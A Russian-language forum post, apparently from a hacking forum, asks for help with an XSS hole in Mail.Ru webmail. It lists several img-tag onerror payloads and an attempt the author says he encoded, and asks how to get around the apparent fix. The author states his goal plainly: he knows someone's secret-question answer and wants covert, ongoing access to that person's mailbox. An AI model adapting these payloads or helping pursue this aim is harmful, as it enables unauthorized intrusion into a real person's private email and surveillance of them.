Хочу спросить по поводу XSS в Mail.Ru.
Если я правильно понял, то вот такой вариант уже не катит:
PHP код:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('4')>
Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого:
PHP код:
<img src="http
://img.mail.ru
/mail/ru/image
s/dumb.gif>"on
error=alert('TEXT'
)>
Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал.
Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали?
Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться
))